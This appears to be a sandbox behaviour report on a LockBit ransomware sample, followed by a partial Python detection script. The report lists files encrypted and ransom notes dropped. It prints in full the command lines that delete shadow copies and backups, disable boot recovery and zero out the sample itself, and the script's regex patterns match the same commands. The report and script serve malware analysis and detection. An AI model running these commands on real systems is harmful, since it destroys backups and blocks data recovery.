File opened for modification C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppPackageAppList.targetsize-16_altform-unplated_contrast-white.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1907.3152.0_x64__8wekyb3d8bbwe\Assets\InsiderHubAppList.targetsize-60_contrast-black.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\Java\jre-1.8\lib\meta-index C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.ScreenSketch_10.1907.2471.0_x64__8wekyb3d8bbwe\Assets\ScreenSketchSquare44x44Logo.targetsize-80_contrast-black.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsSoundRecorder_10.1906.1972.0_x64__8wekyb3d8bbwe\Assets\VoiceRecorderAppList.targetsize-64_altform-unplated.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ca-es\Restore-My-Files.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\sv-se\ui-strings.js C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioStd2019VL_KMS_Client_AE-ul-oob.xrm-ms C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\lua\modules\common.luac C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsAlarms_10.1906.2182.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\TimerSmallTile.contrast-white_scale-125.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\resources.1d9d722e.pri C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\es-es\ui-strings.js C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Getstarted_8.2.22942.0_x64__8wekyb3d8bbwe\Assets\GetStartedAppList.targetsize-64_altform-lightunplated.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.People_10.1902.633.0_x64__8wekyb3d8bbwe\Assets\contrast-black\PeopleAppList.targetsize-20_altform-unplated.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\jre\THIRDPARTYLICENSEREADME.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019MSDNR_Retail-pl.xrm-ms C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\[email protected] C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppPackageAppList.targetsize-72_altform-unplated_contrast-black.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalculatorAppList.targetsize-256_altform-colorize.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\telemetryrules\hxoutlook.exe_Rules.xml C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsSoundRecorder_10.1906.1972.0_x64__8wekyb3d8bbwe\Assets\VoiceRecorderAppList.targetsize-256_altform-lightunplated.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File created C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\DSCResources\MSFT_PackageManagementSource\es-ES\Restore-My-Files.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1808.3.0_x64__8wekyb3d8bbwe\Microsoft.Advertising\vpaid.html C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\ReactAssets\assets\RNApp\app\uwp\images\stickers\word_art\sticker32.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\HxMailMediumTile.scale-150.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\hu-hu\Restore-My-Files.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\ClientLangPack_eula.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\[email protected] C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File created C:\Program Files\Microsoft Office\root\Templates\1033\Restore-My-Files.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\twitch.luac C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherIcons\30x30\82.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins3d\prc\Restore-My-Files.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WebpImageExtension_1.0.22753.0_x64__8wekyb3d8bbwe\Assets\SmallTile.scale-125.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_1.1911.21713.0_x64__8wekyb3d8bbwe\processing.slk C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\ReactAssets\assets\RNApp\app\uwp\images\onboarding\landing_page_start_a_coversation_v3.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\OutlookMailLargeTile.scale-400.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\ExchangeLargeTile.scale-200.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\fr-ma\ui-strings.js C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\ru-ru\ui-strings.js C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WebpImageExtension_1.0.22753.0_x64__8wekyb3d8bbwe\Assets\AppList.targetsize-256.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_listview_selected-hover.svg C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\fr-ma\ui-strings.js C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\PROOF\MSSP7FR.dub C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.SkypeApp_14.53.77.0_neutral_split.scale-125_kzf8qxf38zg5c\Assets\Images\SkypeLargeTile.scale-125_contrast-black.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\Assets\Audio\Skype_Dtmf_4.m4a C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\EmptyShare-Dark.scale-200.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\ext\meta-index C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\PublisherVL_KMS_Client-ul.xrm-ms C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioProO365R_SubTrial-ppd.xrm-ms C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\ONENOTE_WHATSNEW.XML C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsStore_11910.1002.5.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\AppTiles\SplashScreen.scale-125.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\AppPackageAppList.scale-400.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\Standard.targetsize-16_contrast-black.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.YourPhone_0.19051.7.0_x64__8wekyb3d8bbwe\Assets\AppTiles\AppIcon.targetsize-64_altform-lightunplated.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\pl-pl\Restore-My-Files.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\css\main-selector.css C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.HEIFImageExtension_1.0.22742.0_x64__8wekyb3d8bbwe\Assets\AppList.targetsize-36_altform-unplated.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxMailAppList.scale-100.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Assets\contrast-black\iheart-radio.scale-200_contrast-black.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\contrast-black\WideLogo.scale-100_contrast-black.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\mshta.exe

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 C:\Windows\System32\vds.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName C:\Windows\System32\vds.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 C:\Windows\System32\vds.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName C:\Windows\System32\vds.exe N/A

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Modifies Control Panel

evasion
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2480455240-981575606-1030659066-1000\Control Panel\Desktop\WallpaperStyle = "2" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2480455240-981575606-1030659066-1000\Control Panel\Desktop\TileWallpaper = "0" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2480455240-981575606-1030659066-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wbengine.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\wbengine.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wbengine.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1848 wrote to memory of 4276 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe C:\Windows\System32\cmd.exe
PID 1848 wrote to memory of 4276 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe C:\Windows\System32\cmd.exe
PID 4276 wrote to memory of 3292 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 4276 wrote to memory of 3292 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 4276 wrote to memory of 1396 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 4276 wrote to memory of 1396 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 4276 wrote to memory of 3916 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 4276 wrote to memory of 3916 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 4276 wrote to memory of 1824 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 4276 wrote to memory of 1824 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 4276 wrote to memory of 4312 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\wbadmin.exe
PID 4276 wrote to memory of 4312 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\wbadmin.exe
PID 1848 wrote to memory of 2776 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe C:\Windows\SysWOW64\mshta.exe
PID 1848 wrote to memory of 2776 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe C:\Windows\SysWOW64\mshta.exe
PID 1848 wrote to memory of 2776 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe C:\Windows\SysWOW64\mshta.exe
PID 1848 wrote to memory of 4476 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe C:\Windows\SysWOW64\cmd.exe
PID 1848 wrote to memory of 4476 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe C:\Windows\SysWOW64\cmd.exe
PID 1848 wrote to memory of 4476 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe C:\Windows\SysWOW64\cmd.exe
PID 4476 wrote to memory of 1060 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 4476 wrote to memory of 1060 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 4476 wrote to memory of 1060 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 4476 wrote to memory of 5600 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\fsutil.exe
PID 4476 wrote to memory of 5600 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\fsutil.exe
PID 4476 wrote to memory of 5600 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\fsutil.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet

C:\Windows\system32\vssadmin.exe

vssadmin delete shadows /all /quiet

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\System32\Wbem\WMIC.exe

wmic shadowcopy delete

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} recoveryenabled no

C:\Windows\system32\wbadmin.exe

wbadmin delete catalog -quiet

C:\Windows\system32\wbengine.exe

"C:\Windows\system32\wbengine.exe"

C:\Windows\System32\vdsldr.exe

C:\Windows\System32\vdsldr.exe -Embedding

C:\Windows\System32\vds.exe

C:\Windows\System32\vds.exe

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\LockBit-note.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 "C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe" & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe"

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.7 -n 3

C:\Windows\SysWOW64\fsutil.exe

fsutil file setZeroData offset=0 length=524288 "C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 2776 -ip 2776

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2776 -s 1676
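
Detection logic for the behaviour recorded in the Processes table above and for the port 445/135 sweep in the Network table that follows, as an added example that is not part of this report or of the sandbox's own signature set: it runs over constructed, Sysmon-shaped process-create and network-connect records (the command lines are the ones shown above; the event layout and the source address 10.127.0.77 are assumptions), flags each tool in the recovery-inhibition chain separately, pairs the fsutil setZeroData call with the del of the same path to catch the self-wipe, and counts distinct destinations per (source, port) to surface the /24 sweep.

```python
"""Detectors for three behaviours recorded in this detonation: the
recovery-inhibition chain launched through cmd.exe, the fsutil/del
self-wipe, and the sweep of TCP 445 and 135 across a /24.
All events below are constructed, Sysmon-shaped records (EventID 1 =
process create, EventID 3 = network connect). The command lines are the
ones in the Processes table; the source address and event layout are
assumptions, not data from the sandbox run."""
import re
from collections import defaultdict

# One pattern per tool in the chain, so a partial chain still produces findings.
RECOVERY_INHIBITION = {
    "vssadmin_delete_shadows": re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows", re.I),
    "wmic_shadowcopy_delete": re.compile(r"wmic(\.exe)?\s+shadowcopy\s+delete", re.I),
    "bcdedit_recovery_disabled": re.compile(r"bcdedit(\.exe)?\b.*recoveryenabled\s+no", re.I),
    "bcdedit_ignore_boot_failures": re.compile(r"bcdedit(\.exe)?\b.*bootstatuspolicy\s+ignoreallfailures", re.I),
    "wbadmin_delete_catalog": re.compile(r"wbadmin(\.exe)?\s+delete\s+catalog", re.I),
}
# fsutil zeroing a file and del of the same path in one command line: the binary wiping itself.
ZERO_DATA = re.compile(r'fsutil\s+file\s+setZeroData\s+offset=\d+\s+length=\d+\s+"?(?P<path>[^"&]+)', re.I)
DEL_FILE = re.compile(r'\bdel\s+(?:/[fq]\s+)*"?(?P<path>[^"&]+)', re.I)

SAMPLE_PATH = r"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe"
PROCESS_EVENTS = [  # constructed records; command lines as recorded in the Processes table
    {"EventID": 1, "Image": r"C:\Windows\System32\cmd.exe", "ParentImage": SAMPLE_PATH,
     "CommandLine": '"C:\\Windows\\System32\\cmd.exe" /c vssadmin delete shadows /all /quiet'
                    ' & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures'
                    ' & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet'},
    {"EventID": 1, "Image": r"C:\Windows\SysWOW64\cmd.exe", "ParentImage": SAMPLE_PATH,
     "CommandLine": f'"C:\\Windows\\System32\\cmd.exe" /C ping 127.0.0.7 -n 3 > Nul'
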